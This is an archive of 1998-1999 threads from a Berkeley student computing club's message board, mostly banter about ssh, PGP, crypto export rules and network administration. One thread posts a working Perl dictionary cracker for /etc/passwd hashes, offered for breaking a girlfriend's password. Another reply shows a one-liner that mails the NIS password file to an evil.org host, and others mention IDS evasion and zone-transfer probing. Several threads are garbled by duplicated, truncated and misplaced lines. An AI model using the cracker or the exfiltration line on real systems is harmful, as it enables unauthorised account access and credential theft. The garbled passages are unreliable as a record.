                their sales much, then they wont fix it/ for example a major
                IDS which will remain nameless only keeps 3minutes of "state",
                which means if you just control-z a connection for 3min, you
                have probably evaded the monitor. anyway, if you are serious
                drop us a note. i am not going to publicly comment on the
                non-passive part of the monitoring. --psb
                \_ Yeah.  We have a whole library of scripts written
                   in a custom language for sending and receiving raw
                   net traffic that we use for OS fingerprinting,
                   firewall penetration testing, and IDS circumvention.
                   We have a collection of scripts whose purpose is to
                   exploit descripencies in stack implementation so that
                   the IDS and the target systems state become disjoint,
                   allowing us to insert evil data w/o the IDS detecting it.
                   It would be interesting to see how BRO handles under
                   these conditions.  --sky
                \_ "non-passive": guys in full-length black Kevlar suits
                   with BIG GUNS
                        \that's "big *fucking* guns" to you. --psb
                \_ Um, this whole conversation has me completely lost.
                   Any sources to strengthen my security/network fu?
        \_ How about just forcing telnetd/rlogind users to use one-time
           passwords until they can be elite enuf to use some kind of encrypted
           login system?
                \_Is using ssh w/o sshd a waste of time?
                  \_ sshd is the server; ssh is the client.. they're pretty
                     useless without each other.  You probably meant
                     "w/o ssh-agent" And no, ssh is still useful without
                     ssh-agent, whatever psb might think about the impossiblity
                     of ssh password authentication --dbushong
                        \-i dont even know what "the impossibility of ssh
                        passwd authentication means". the only think i said
                        was close if not actually impossible was for a passive
                        monitor upstream from a destination host to replicate
                        the stream it would see if it were in a different
                        point in "net space". aka "the TTL attack". --psb
                  \_ some silly places have ssh set up to automatically call
                     rlogin when the target host is not running sshd.  this
                     is a completely useless way to run ssh, and might
                     screw you one day when you're tired and not noticing that
                     this time your connection is not encrypted.
                     \_ You implied in your original post that you need to
                        generate an ssh key in order to use ssh, which is not
                        true.  --dbushong
                        \-BTW, is anyone familiar with the stuff at
                        <DEAD>srp.stanfraud.edu<DEAD>? --psb
                        \_ Yes.  mconst was thinking of patching it into
                           ssh one of these days.  --dbushong
1999/2/24 [Computer/SW/Security] UID:15469 Activity:nil
2/23    HELP TURN BAY BRIDGE FRAUD ON IT'S HEAD!!!!
            One-click E-Z activism:
                <DEAD>users.lanminds.com/~jmeggs/baybridge.html<DEAD>
            Cool editorial in SF Chronicle today:
                http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/02/23/ED54484.DTL
1999/2/19-21 [Computer/SW/Security] UID:15449 Activity:low
2/19    Don't buy from Site For Sore Eyes.  Besides being incompetent,
        overpriced, and complete liars ("Your insurance will cover it."),
        their service sucks and their warranty is virtually useless.
        \_ Try "For Eyes".  Prices are fairly reasonable and service is
           very friendly.  They also have a good warrenty on their stuff.
        \_ "For Eyes" will also fix your b0rken eyewear free of charge
                even if you didn't buy it there...if it can be fixed.
1999/2/1-2 [Computer/SW/Security, Recreation/Media] UID:15340 Activity:low
2/1     http://www.infobeat.com/stories/cgi/story.cgi?id=2558287745-883
        At&t phone service over cable tv cables.
        \_ would you trust people who can't even keep up their own web site?
           and who can't promise a representative will get back to you
           sooner than "sometime in the next 24 hours"?
1999/1/28-29 [Computer/SW/Security] UID:15310 Activity:moderate
1/27    Why isn't biff working? Why isn't comsat running?
        \_ because comsat is a stupid idea and a security hole.
                \_ What kind of security holes exist? Can't we just use
                   pam.d to block all comsat access EXCEPT 127.0.0.1?
                \_ root compromises from 127.0.0.1 are still root compromises.
        \_ just run philbiff +lots, its much coooler. -ERic
        \_ use "newmail"
        \_ Procmail and a few lines of perl works better.
1999/1/26-29 [Computer/SW/Security] UID:15296 Activity:kinda low
1/26    Is it possible to SSH out through a firewall to, say, soda?  For
        some reason, my connection keeps timing out.
        \_ depends on the firewall and the ssh installation.
        \_ try ssh -v, ssh -P, and ssh -v -P
        \_ Is it possible they blocked outgoing connections.  As the above
           said, it depends.

              __
             /  \
            / ..|\
           (_\  |_)
           /  \@' Woof!  Damn your mom was good.
           /  \@' Woof!  Damn yer mom was good.
          /     \
      _  /  `   |
     \\/  \  | _\
      \   /_ || \\_
       \____)|_) \_)

        \_ stay! good doggie.

              __
             /  \
            / ..|\
           (_\  |_)
           /  \@'
          /     \
      _  /  `   |
     \\/  \  | _\
      \   /_ || \\_
       \____)|_) \_)
1999/1/21-23 [Computer/SW/Security] UID:15276 Activity:nil
1/21    Rewling ssh/telnet client for winblows...
        http://www.vandyke.com
        \_ Better ssh/telnet client for windows, and this one's free:
           http://www.zip.com.au/~roca/ttssh.html
1999/1/17-18 [Computer/SW/Security] UID:15246 Activity:kinda low
1/15    Two sys admin questions:
        1) How do I disable EXPN in sendmail 8.8.7?
        2) Is ssh 1.1 client compatible with ssh 2.0 server?
           \_ i think you need to install the old sshd and then tell ssh2d
              to accept ssh connections using sshd rather than ssh2d.  The
              protocols are different and hence are not compatible.
        \_ bang yourself on the head with a ball-peen hammer until you
           get over this stupid idea that you should disable EXPN.  -tom
        2) Is ssh 1.1 client compatible with ssh 2.0 server?
           \_ i think you need to install the old sshd and then tell ssh2d
              to accept ssh connections using sshd rather than ssh2d.  The
              protocols are different and hence are not compatible.
1999/1/14-17 [Computer/SW/Security] UID:15232 Activity:high
1/13    Irish lassie makes encryption breakthrough:
        URL:  http://www.msnbc.com/news/231690.asp
        \_ Who cares?  The only people who use encryption are pinko commies
           and perverts with something to hide . . . and dirty foreigners.
           It's no surprise that a foreigner came up with this.  I wouldn't
           be surprised if she turns out to be a commie.
           \_ Gee.  If that 16-year-old girl were a Cal student instead,
              would you guys say the same thing?
              \_ It would depend on whether or not she was a hottie.
                \_ She was rather plain but I'm sure soda geeks would be all
                   over her.
        \_ Has it been subjected to any serious peer review?  Bruce
           Schneier points out that smart people are wont to invent bad
           ciphers when they ignore peer review...
           \_ It was submitted to a school science fair.  (or fare? wtf is the
              online dictionary?)
              \_ /csua/bin/webster
        \_ I would be really interested to see an alternative crypto
           algorithm that is "10 times faster than RSA".  Unfortunatly
           the most technical detail provided by the URL is that she used
           2x2 matrices.
        \_ Is there a philcrypt?  I'll bet that Phillip could kick her
           ass without even trying . . .
                \_ cnn reported that an unknown American student known only
                   as "Phillip" appeared at her home in Ireland and kicked
                   her ass.  Witnesses reported that he didn't even work up
                   a sweat.
        \_ There's better info at:
                http://slashdot.org/comments.pl?sid=99/01/13/0931237&cid=500
           Summary: no big deal
        \_ How long does it currently take to encript one piece of email?
           If it only takes 1ms or so, it isn't a big deal even if it's ten
           times faster, right?  How many pieces of email can you send in
           one second?
           \_ Currently, public-key encryption is too slow to use even for
              email -- that's why programs like pgp encrypt your mail using
              ordinary private-key encryption, and then use RSA to encrypt
              the key.
              \_ So how slow is it?  Say for a 10KB text email that someone
                 types up, approximately how long does it take?
           \_ How about a 30GB file?  Or a few terrabytes?  With the rise in
              ecommerce and the movement of large amounts of financial data
              on the net, this is a serious possibility for a large corp. or
              a government.  Could also be plans for that new jet fighter. A
              marketting campign.  Or the Pres. ordering a hit on a foreign
              national.  Smaller delays are always a good thing if the cost
              is zero.
        \_ If it's even only "as good as" existing methods, it would be
           a great thing, seeing as how
           1. It is OUTSIDE the US
           2. it is not patent or copyright protected.
           \_ My impression was that her "method" was just a speeedup
                to RSA, which would mean that you still have to pay
                RSA to use it.
                \_ I read some pseudo tech stuff from the MIT guys she worked
                   for and ripped off the core ideas from.  It isn't RSA.
                        \_ Can you give a URL, please?
1999/1/13 [Computer/SW/Security] UID:15221 Activity:nil
1/12    Can someone point out the URL to download SSH server? Thanks.
        \_ http://www.yahoo.com
        \_ www.ssh.fi           -nolram
1999/1/12 [Computer/SW/Security] UID:15212 Activity:high
1/11    Anybody know of environmental organizations that needs volunteers
        to plant trees year round, and not just on arbor day?  I want to
        volunteer for such an organization. Any web site or other pointer
        would be greatly appreciated.
        \_ <DEAD>www.treehuggers.org<DEAD>
                \_ <DEAD>www.treehugginghippies.com<DEAD>
        \_ Friends of the Urban Forest do it here in SF: http://www.fuf.net -ausman
        \_ there's going to be an International Volunteer Conference on Feb 6,7
           Im sure they'd have info on tree volunteer stuff.    --sly
            From: Cal Corps Public Service Center <ccorps@uclink4.berkeley.edu>
            Community Service Around the World Conference and Expo
            February 6 & 7, 1999

            Register early or at the door on February 6th. To preregister,
            email conference@lafetra.org and request registration
            information.

            EVENT LOCATION
            MLK Student Union Building, corner of Bancroft and
            Telegraph on the UC Berkeley Campus

            URL: http://uga.berkeley.edu/calcorps
        \_ Thank you all for the pointers!
1999/1/7-10 [Computer/SW/Security] UID:15183 Activity:high
1/6     Is there a mail program on a unix machine (say, soda) that uses
        pgp automatically when you read a mail in a mailbox file.
                \_ the latest versions of elm do
                   \_ How?  Can't find mention of pgp in man elm.
        \_ Why, do you fear the power of root cow?
        \_ modify the sending-filters entry under pine.
                \_ the latest versions of elm do
        \_ You could easily write a program to watch your mail file for
           changes, and encrypt it to a new file when it does change.
           In fact you could just hack up biff to do it!
           \_ My hacking fu is not strong.  Is there a way to use pgp
                within pine?  I just want to do pgp message wise like
           \_ My hacking fu is not weak.  Is there a way to use pgp
           And if you are root, then just hack your incoming mail program,
           not that hard.
           \_ My hacking fu is weak.  Is there a way to use pgp
                within pine?  I just want to do pgp message-wise like
                some MIME encoding.  BTW, what does pgpdecode and pgpencrypt
                do?  Can't man them.
                \_ sigh. do this:
                  "pgp -kg"
                  "elm"
                  The rest is self-documenting.
                  Oops. After you set your o)ptions to be an intermediate
                  instead of beginning user in elm, that is.
        \_ What is up w/ PGP for UNIX anyway.  How come for Windows & Mac,
           you can get PGP6, w/ 4096-bit keys, but UNIX world continues
           to plod along w/ 2.6.2 w/1024-bit keys.
           http://www.pgpi.com for latest versions.
                      \_ you lose
           \_ I think the only difference is the key generator.  Just use
              the inferior OS version to generate your 4096 bit key but
              use pgpi to actually send and receive.
                \_ mutt has much better pgp support than elm.  -tom
                   \_ but i like elm better
                      \_ you lose  the popularity contest,
                                   but win a better mailreader
1999/1/6-7 [Computer/Networking, Computer/SW/Security, Computer/SW/Unix] UID:15181 Activity:nil
1/6     Let's say I do a "netstat -a" and see someone is hogging up a port
        that I need (ie. I'm running a MUD server). As a root, how do I
        delete the process that is associated with that port? Thanks.
        \_ use lsof to get the pid of the process that is using
           the port.
1999/1/6 [Computer/SW/Security] UID:15180 Activity:nil
1/6     Oh, I'll be darned. Say hello to Tawei Liao:
        % netstat -a | grep tawei
        f4b47800 stream      0    f48ee680 0 /tmp/ssh-tawei/agent-socket-8677
1999/1/6 [Computer/SW/Security, Academia/StanfUrd] UID:15177 Activity:nil
1/5     From http://www.finjan.com/wsj2.cfm about the Excel security hole:
        "We think this is probably the biggest security hole in Internet
        history," said Bill Lyons, Finjan's chief executive officer. "Any
        student at Stanford could exploit it."

        Yup!  Only M$ is dumb enough to have created such a huge security
        hole that even Stanfurd students can exploit it. :-)
1998/12/30-31 [Computer/SW/Security] UID:15146 Activity:kinda low
12/28   Help crack DES again. http:/http://www.distributed.net
        \_ oh boy how exciting.  Get a fucking life.
           \_ If you don't like tech projects, don't read the soda motd.
                \_ Crunching random numbers over and over again is not
                   a tech project.  -tom
                   \_ You tell 'em Tom!  Crush their will, destroy their ego!
                      You, truly, are the only one who knows anything!  Lend
                      us a tiny fleck of your vast wisdom!
           \_ Although I think the DES cracking project is ridiculous, I don't
              see anything wrong with others participating.  It isn't as if
              these people are sitting there putting in real effort instead of
              having lives.  They just run the client and hope to get lucky
              and see their name in lights.  What's wrong with that?
              \_ Plus, hopefully the government will realize the futility of
                 their cryptography export restrictions when DES is cracked
                 in a short enough time (its down to 2 days).
                        \_ Highly doubtful.  The previous cracking attempts
                           merely resulted in the US govt. convincing most
                           of Europe & Asia to join in the encryption export
                           stupidity, to make it harder for us to import
                           software.  (Besides, most congressmen wouldn't
                           know a DES crack from the giant holes in their
                           heads.)
        \_ It hasn't started yet, it was just announced.  It starts in
           January.
        \_ Sillyness about http syntax deleted.  It was too silly even for
           the motd.
1998/12/4-6 [Computer/SW/Security] UID:15065 Activity:high
12/3    The Wassenaar agreement has been signed; approximately speaking, it
        is a treaty which will require other countries to impose US-style
        export controls on cryptography.  http://www.wassenaar.org
        \_ Damn Republicans.  They had to start this whole anti-
           cryptography crap.  I can't believe Clinton actually
           supports them too.
                \_ Going back to the clipper chip this was always a big
                   Clinton issue.
        \_ It's so ironic that the US is the only democratic government
           in the world that is so paranoid about public use of public
           key cryptography.
           \_ It's for your protection.
              \_ If owning a public key is criminal, only criminals will own
                 a public key.
              \_ Outlaw public key crytography.  Great, now no one can
                 use pgp and ssh and people who do 'require' ssh and ssl
                 (like sysadmins) can't use them anymore.  And yes there
                 are a lot of non-government systems that do require
                 encryption.  Speaking of protection, do you think if
                 you outlaw pub key crytography that criminals or
                 terrorists won't try to get there hands on it.  Now
                 you've just outlawed legitimate use of the technology
                 and let criminals use it.  Read up on it more and
                 you'll see why outlawing it is such a bad idea.
                 /ftp/pub/cypherpunks
                 \_ I think you are responding to a joke.
                    \_ Yes, it was a joke.  Too bad some people just don't
                       get it.  Lighten up folks.
                       \_ ah yes, that was just so hillarious i forgot to
                          laugh.
                        \_ No, you're just a friggin' idiot with no sense
                           of humor and lacking the slightest shred of what
                           might pass for intelligence at the dismal pit
                           Berkeley has become at the undergraduate level.
                           \_ tom, is that you again?  What did I tell
                              about judging other people's sense of humor
        \_ If I was a criminal and I really wanted strong encryption why
           couldn't I just code up the RSA public key cryptography algorithm?
           Granted it might take a little while but my point is that anyone
           who wants strong cryptography can write it themselves.
           Do the anti-crypto people have an argument against this?
           \_ It's not as easy as it seems to code these algorithms.  There's
                 on cryptography.  Nevertheless, he studied in enough
              all kinds of attacks that don't necessarily involve breaking
              the underlying math.  It's definitely possible, but I think
              that it's only feasable for criminals who can hire people with
              the appropriate fu.    - mikeym
              \_ Actually, it is as easy as it seems.  The original creator
                 of PGP was Phil Zimmerman who himself was not an expert
                 on cryptography.  Nevertheless, he studied it in enough
                 and consulted enough people about any loopholes in his
                 program that he finally came up with a product that is
                 now widely used.  All from a joe schmo who graduated
                 from U.Florida with a B.S. in computer science.
                 \_ I don't think that PGP has the NSA quaking in its boots.
              \_ But the threat of public key cryptography comes not from
                 individual terrorists (I don't think Timothy McVeigh
                 used pgp) but from other countries and their military,
                 which are competent enough to implement a robust
                 cryptographic system if they wanted to without the help
                              can keep recompiling and changing the key size
                 of anyone in the US.  Which is why banning public key
                 cryptography is pointless.
                 \_ Yes, this is true, but my point was that it requires
                    more than the common criminal can do.  Not just "anyone"
                    can do it.  I would even guess that many governments would
                    have trouble outsmarting the NSA.  - mikeym
                    \_ The "common" criminal is a purse snatcher or car
                       jacker.  It's likely the only computer they ever owned
                       was the one stolen from your apartment.
                        \_ Read what I was replying to: "anyone who wants
                           strong cryptography can write it themselves."  This
                           is FALSE.  It requires a lot of knowledge and
                           intelligence.  That was my WHOLE point.  - mikeym
                           \_ You didn't have a point.
                           \_ Any moron can download and compile the
                              int'l version of PGP. And of course they
                              can keep recompiling and increasing the key size
                              (for use amongst themselves) forever.
                                \_ PGP is the height of security?
                                   \_ It's "pretty good", no more, no less.
              \_ So it is not a technical problem but a money one? -jon
1998/11/23-1999/2/2 [Computer/SW/Security] UID:15002 Activity:nil 58%like:14964
11/15   Learn to use ssh -- read "/csua/adm/doc/ssh-howto". -brg
1998/11/19 [Recreation/Computer/Games, Computer/SW/Security] UID:14981 Activity:nil
11/19   http://www.gamecenter.com/Reviews/Item/0,6,0-2289,00.html?st.gc.fd.gca
        \_ Oh. My. God.
1998/11/15-23 [Computer/SW/Security] UID:14964 Activity:nil 58%like:15002
11/15   Dealing with people who get their passwords sniffed is a waste of the
        CSUA's time. Learn to use ssh -- read "/csua/adm/doc/ssh-howto". -brg
1998/11/14-16 [Computer/SW/Security, Computer/SW/Unix] UID:14955 Activity:nil
11/13  What's up with the following? just a routine passwd change...

        http://soda.CSUA.Berkeley.EDU% passwd
        Error: /dev/d0f3 Failure level 2
        \_ This means they just posted your password & login to the net.
1998/11/14-16 [Computer/SW/Security] UID:14954 Activity:moderate
11/13   I have a text file that I want to have a leggaly admissible time stamp.
        This should be easy with some type of public key.  Is there a service
        like that?
        \_ I don't think there exist any such electronic notary service.
           If the recipient trusts you then you yourself can put a time
           stamp on the text file and then you can use pgps to sign it.
           Therefore your recipient knows that there's only one person
           that can medle arount with the time stamp.
           \_ There is no specific recipient --- it's not an email message.
                I just need to prove that I created it on some specific day.
        \_ print it out and take it to a notary.
           \_ Is there no electronic/"hi tech" way to do it?
              \_ case law too new, risky to do it high tech unless you are
                 Novell/MS/etc. and have $ lawyers - do it old-fashioned way
1998/11/13-16 [Computer/SW/Security] UID:14952 Activity:nil
11/13   How do people deal with pgp under multiple accounts?  Do they
        simply recreate a new key all together or do they use the same one?
        Also, if you change things like your email address or passphrase
        do you have to redistribute your public key all over again or
        can your corresponents use the same key.  thx. --pgp hozer
                \_ Is that you, mark?
1998/11/13-16 [Academia/Berkeley/Classes, Computer/SW/Security] UID:14950 Activity:nil
11/12   Wow, further proof that our dorms aren't as bad as we
        thought:
        http://www.nytimes.com/library/tech/98/11/circuits/articles/12prin.html
        \_ Unit 2 Cunningham has had this since '92.
        \_ got a username/passwd for us to use?
           \_ cypherpunk/cypherpunk
           \_ just create one for yourself
           \_ It's free.  Try this:
                http://verify.nytimes.com/subscribe/sub-bin/new_sub.cgi
        \_ What's that sound?  Is that the sound of freedom being chipped
           away, bit by bit?  What's that?  It's for my safety?  Gee, thanks.
        \_ Anyone know the detection range for our prox cards?  Is it the
           ~3 cm you have to get to the readers to get them to unlock the
           door, or could they be read from a longer distance in theory?
1998/11/3-4 [Computer/SW/Security] UID:14887 Activity:high
11/3    Is the latest ssh bug really worth deinstalling it?  My friend and
        I are having an arguement over this point. A URL on the subject:
        http://news.freshmeat.net/readmore?f=ssh-vulnerability  --ssh h0zer
        \_ No definetly exploitable vulnerability has been found yet
            Until one is, you're much better off using it than not
            \_ Your machine is safer with no login mechanisms, not even
               ssh.   In fact, its even more secure if you unplug it from
               the net, unplug it from power, lock it in a safe, and bury
            \_ Your machine is safer with no login mechanisms, not eve
                \_ But even then your host can still be easily compromised
                   through the use of brute-force methods.  If you're really
                   concerned, the best solution is to not buy a computer at
               ssh.   In fact, its even more secure if you unplug it fro
               the net, unplug it from power, lock it in a safe, and bur
               that safe beneath your home
                   \_ but then I miss out on all the cash I get from
                \_ But even then your host can still be easily compromise
            \_ IBM has specially denied the assertion that it had ever
               uncovered an exploitable bug in ssh, and is complaining
               about rootshell's unethical use of a minor advisory which
               does not appear to detail any real security threat.  So the
                   through the use of brute-force methods.  If you're reall
                   concerned, the best solution is to not buy a computer a
                   all.  Go outside and enjoy the blue sky and sunshine -
                   you'll have all that extra pocket cash to take with you
                   \_ fresh air smells funny. i think i'll stay inside soda
                   \_ but then I miss out on all the cash I get fro
                      cracking other peoples' ssh-guarded firewalls
            \_ IBM has specially denied the assertion that it had eve
               uncovered an exploitable bug in ssh, and is complainin
               about rootshell's unethical use of a minor advisory whic
               does not appear to detail any real security threat.  So th
               people who supposedly found the bug say there is none
1998/11/2-3 [Computer/SW/Security] UID:14876 Activity:kinda low
11/2    IMAP service (finally) available on UCLink4.  See:
        http://weblink.berkeley.edu:8000/imap.html for details.
        \_ It's been there for a while, but they only just announced it.
           Has anybody tried it?
1998/10/13-15 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:14769 Activity:low
10/12   Is there a web site for the Spanish channel Ch14?  Thanks.
                \_ http://www.univision.com
                   \_ But that's a company called VisiCom which makes video
                      hardware.
1998/10/12-14 [Computer/SW/Security, Computer/SW/Unix] UID:14767 Activity:kinda low
10/12  Is is true that if a user account is comprmised on a network of computers
       running NIS, the entire network of computers running NIS are compromised?
        \_ It will allow people to "ypcat passwd | mail someone@evil.org",
           which should be considered a problem.  This is probably what whoever
           said that was thinking of.
                \-well, that isnt really enough info to make any guesses but
                my guess would be "if the user can log into one NIS client,
                the login in probably valid on other clients which would need
                to be checked out". the more involved question is "if someome
                breaks root on a NIS client, what are the implications for the
                whole domain". --psb
                \_ Not "enough info to make any guesses"?  The quality of
                   users' password choices has not gotten any better over time,
                   and Crack still works (even better, now that computers are
                   faster).
                        \-i mean the poster hasnt provided enough info for an
                answer ... we cant really guess what the question means. --psb
1998/10/8-11 [Computer/SW/Security] UID:14752 Activity:kinda low
10/7    I want to use a console based ssh on my NT machine (i.e. so
        that I can run ssh in a MSDOS shell). I have found 1 program
        but that didn't have vt100 support. Any pointers?
        (Why do I want to do this? Because I want to use econsole
         and not the ugly FSecure ssh terminal).
        \_ set up a port forward for port 23 and use whatever telnet client
           you like.  -tom
                \_ But then is there a console based telnet for NT?
                   The standard telnet will pop up another window.
        \_ SecureCRT baby, worth every penny. http://www.vandyke.com
           \_ Or teraterm, also worth every penny but much cheaper.
              http://www.zip.com.au/~roca/ttssh.html
              \_ Teraterm is better than FSecure or SecureCRT, IMHO.
                 Suggested changes: turn off cursor blinking in the .ini
                 file (it's not one of the GUI configurable options), and
                 steal the font from CRT/SecureCRT as it's the one xterms
                 use and looks much nicer than your default options.  Also
                 turn off the menu.. hey.. you don't really need it  --dbushong
                        \_ But can teraterm have transparent backgrounds
                           like econsole?
                           \_ Now seems as good a time as any to ask why
                              the fuck you're running windows..  --dbushong
                           \_ It has source. there fore, if you have clue
                              and time, it can have that.
        \_ Anyone know of any Mac SSH software besides F-Secure?
          \_ NiftyTelnet SSH.
              \_ URL? --dim
                 \_ http://www.lysator.liu.se/~jonasw/freeware.html Note that
                    it's technically illegal for use in the US of A. I'm
                    distribution of th SSH-enabled beta is on hold:
                    actually looking forward to the SSH enabled version of
                    BetterTelnet, which is a really nice Mac telnet client, but
                    distribution of the SSH-enabled beta is on hold:
                    http://www.cstone.net/~rbraun/mac/telnet/beta/ssh.html
1998/10/3-5 [Computer/SW/Security] UID:14728 Activity:nil
10/3    Has anyone bought stuff from InDirect? They seem to have really
        cheap prices. How about Hi-Tech USA? I don't really give
        crap about customer service. I know exactly what I want
        already.
        \_ if you don't care about service then why are you asking?
1998/9/24-26 [Computer/SW/Security] UID:14665 Activity:high
9/24    How do I find out what machines are in a certain domain, e.g.
        http://laney.edu?  Thanks.
        \_ ping -f http://laney.edu
        \_ a little command many people forget about: host -l http://laney.edu
        \_ echo "What machines are in your domain?" | mail postmaster@laney.edu
                \-You have to be so tall ... /tmp/laney.edu --psb
           You could try to use nslookup's ls command to list everything in the
           domain, but most nameservers (including http://laney.edu's) won't let you.
                \-"You have to be this tall ... " ... /tmp/laney.edu --psb
           \_ you could get a map of what network addresses they use, and then
              try to get reverse dns mappings for everything in those addresses.
              This is why disabling zone transfers on a nameserver (i.e. ls)
              is pretty stupid unless you kill reverse dns too. -ERic
                \_ Disabling zone transfers stops the script kiddies for now
                   (until someone takes pity on them and writes them a script
                    to do things the hard way)
                   \_ so until then you end up making it harder on everyone
                       else.
                        \_ stupidity in the name of security is rampant.
                           See soda's relaying policy.  -tom
                        \_ most everyone else doesn't need to do a zone xfer
                           or can ask nicely for one
                           \_ Disallowing them is a security through obscurity
                              policy, and impedes curiosity.  It's like turning
                              off finger on Unix.  Besides, crackers can still
                              scan easily, even without using DNS.
                                \_ or it's like using shadowed passwords
                                   \_ WTF are you smoking!?  Non shadow-passwd
                                      files are a huge security hole.  Give
                                      any user on your system instant access
                                      to all the poor sops' accounts and files
                                      who can't pick a decent password.
                                        \_ unshadowed passwrds aren't the
                                           cause of the security hole, stupid
                                           users are
                                \_ shadowed passwords provide little real
                                   security; it's not difficult to get the
                                   shadow file without root.  -tom
                                   \_ Um, by that logic, it's not hard to get
                                      root, so why bother having any security
                                      at all  --dbushong
                                   \_ Tom, you were the one who suggested
                                      using shadowed passwds and have, until
                                      now, continued to do so on the basis that
                                      it was "more secure" for at least 4 years
                                      now, see CSUA/OCF/XCF Help Session handout
                                      by Tom Holub
                                        \_ I haven't updated that in quite
                                           some time; I haven't taught the
                                           security help session in something
                                           like 3 years.  At the time, I
                                           wasn't aware that programs such as
                                           ftpd can leave large swaths of the
                                           shadow file in core dumps.  -tom
                                \_ That's not the logic.  The logic is that
                                   shadowed passwords provide a false sense
                                   of security.  The security problem with
                                   non-shadowed passwords is having bad
                                   passwords; having shadowed passwords does
                                   little or nothing to alleviate the only
                                   problem it could theoretically solve. -tom
                                        \-i think turning off zone xfers is
                                        basically free to do. of course you
                                        shouldnt rely on it and what is really
                                        the important thing to do is to be able
                                        to see who is asking forone and what
                                        they do right after that. a zone xfer
                                        a pretty good indicator of certain
                                        types of scans/signatures of certain
                                        tools. --psb
                                        \_ Or just curious network users.
                                           E.g. zone transfer of various
                                           things under http://mit.edu is fun.
                \_ Please define "zone transfer"        -- clueless
                   \_ Simple answer: it's what you get when you run
                        host -l or nslookup ls.  Long answer: Read the
                        BIND book from O'Reilley
1998/9/23-24 [Computer/SW/Security] UID:14655 Activity:high
9/22    Any chance of getting ssh2 installed? not clobber ssh1, but just
        have ssh2 available so that we might be able to access other
        systems, pretty please? I'll do it if you gimme the root passwd!
        \_ You don't need to be root.  Just compile it in your home directory
           and delete the source tree once you'r done.  The README tells you
           how to do it.  Or better, put it in some shared directory so
           everyone has access to it.  The only bummer is that you can't get
           the daemon to work without being root.
        \_ What's the diff?
                \_ ssh2 uses the ssh 2.0 protocol which is more secure
                   some ssh2 servers won't accept ssh1 connections
                   \_ does that mean that they won't accept telnet/rlogin
                      sessions since those are less secure.  An ssh2.0
                      only server - that's unheard of.  Stop tabbing so
                        \_ It's what you get if you install sshd2 and don't
                           set it up to call sshd1 to handle old connections.
                           The sshd2 software only knows how to handle ssh 2.0
                           protocol.
                      far to the right.
                      \_ It's not unheard of and it makes great sense. --dim
                        \_ Some cs servers (like torus.cs) only accept ssh
                           & kerberos connections - no normal telnet/rlogin
                           \_ This is a good policy and should be expanded
                              (at least when there are more free
                              implementations of SSH).
           \_ originally, there was a problem with the ssh2 licensing that
              made it okay (without paying for licensing) to say have sshd
              running on a machine if say people were going to login and
              use the machine for homework but not necessarily so for
              machines like restricted access fileservers and nameservers
              that only administrative people needed (or could) log into.
              This may have changed since ssh2 was first released. --jon
              \_ It's still quite far from a free software license.  See
                 /tmp/SSH-LICENSE, if you want all the gory details; there
                 is a project to create a genuinely free replacement. -- schoen
1998/9/22-23 [Computer/SW/Security, Computer/SW/OS/FreeBSD, Computer/SW/Unix] UID:14648 Activity:high
9/22    look what i wrote. have fun cracking your wanabee gf's password!
        \_ and getting kicked off of soda
        \_ This assumes that you have a user readable passwd file.
            \_ or non-shadowed passwd, like soda's
                        \_ /etc/passwd must be world readable, so the

#!/usr/bin/perl

$twink = $ARGV[0];

open(PASSWD,"/etc/passwd");
do {
  $line = <PASSWD>;
  ($user,$passwd) = split(/:/,$line);
} while ($twink ne $user);
close(PASSWD);
$salt = substr($passwd,0,2);
$passwd = substr($passwd,2,);

foreach $attempt (`cat /usr/dict/words`) {
  chop($attempt);
  if($salt.$passwd eq crypt($attempt,$salt)) {
    print "password is: $attempt\n";
    exit(1);
  }
}
print "Unable to crack password\n";
                           "user readable passwd" implies non shadowed
               \_ soda has a shadowed passwd file.  all 4.4 bsd derivatives
                  have such a mechanism.  most modern unix like os's do.
                  only older's like ultrix, older irix, <= 4.3 bsd derivs
                        \_ even ultrix has shadowed passwds
                           \_ I am not sure if I would call that
                              monstrosity a passwd file, but okayn in that
                              case, I amend my earlier statement to include
                              ultrix and sunos as shadowable --jon
                \_where does soda keep its shadow passwd's?
                        \_ where no one but the people with enough clue
                           to RTFM can find them
        \_ Alec Muffett >> you
        \_ /usr/dict/words is a lame dictionary - real crackers use much
                much larger dictionaries
           \_ Real crackers kidnap the person, tie him/her up, and beat
              the shit out of him/her until (s)he gives you the password
                \_ REAL crackers get root shell...
                   \_ True crackers don't bother with gf's account. They
                      sift through her lingerie drawer for a diary
                      (amongst other items...)
                        \_ CSUA crackers sift through her lingerie drawer
                           and wear it.
                                \_ Free Kevin Mitnick!
1998/9/4-5 [Computer/SW/Security] UID:14546 Activity:nil
9/4     I'm going to school at MIT now and they make you pay to
        connect to the campus network.  Does Berkeley still provide
        free access?  Also can anyone suggest some good ISPs in the
        Cambridge/Boston area?  Thanks.  -emin
        \_ berkeley's is 642-9600.  you need to get an account first at
           http://www-uclink.berkeley.edu (they combined the forms for homeip and
           email) or you could try to telnet to <DEAD>hip.berkeley.edu<DEAD>.
1998/9/3-7 [Computer/SW/Security] UID:14538 Activity:nil
9/3     I remember on UCTwink, when I logged in, it would tell me how many
        previous unsuccessful login attempts, if any, there were. Is there
        anything similar on CSUA?
        \_ Nope, though they could simulate it using the system logs, or by
           patching login.  But you should be using SSH...  -- SSH h0zer
1998/8/26-27 [Computer/SW/Security] UID:14518 Activity:moderate
8/26    ssh 2 now released -jon (usu place, usu way) -jon
        \_ Damnit, i just finished installing the old one on my computer.
           you should have told me sooner.
       \_ local mirror?  And what new features/security holes doe sit have
          that we should be upgrading it to for?
          \_ I had trouble getting to the ftp site since net to finland
             is a little slow.  It implements the ssh2 protocol which is
             on the IETF standards track.  read comp.security.ssh for
             more info --jon
             \_ I'm sure. So is there a local copy here you're willing to
                share?
        \_ You want to upgrade your client so you can talk to new ssh2 servers,
           but don't want to upgrade your servers until everyone has the new
           client as they don't play nicely with older clients.
        \_ ssh 2 server can serve ssh 1 clients, sort of.  You keep
           sshd1 around, and ssh 2 can call it, if it's configured to.
                --PeterM
1998/8/26 [Computer/SW/Security, Computer/SW/Unix] UID:14511 Activity:high
8/26    "I have a problem with extracting from a .tar file.
        When I archived it,
        \_ Use gnu tar.
        \_ you should finish your question.
                tar xvf foo.tar to extract files
                tar cvf foo.tar foo to archive directory foo into foo.tar
                tar xzvf and czvf will handle tar.gz files.
           \_ I would have finished my sentence, but
                \_ I think the best bet is if you
                        \_ Yeah but that won't work becau"

        \_ Let me complete the part of the question that was deleted by
        someone.
                I unthoughtfully archived from the root directory using
                "tar", but now I am under a different directory system and
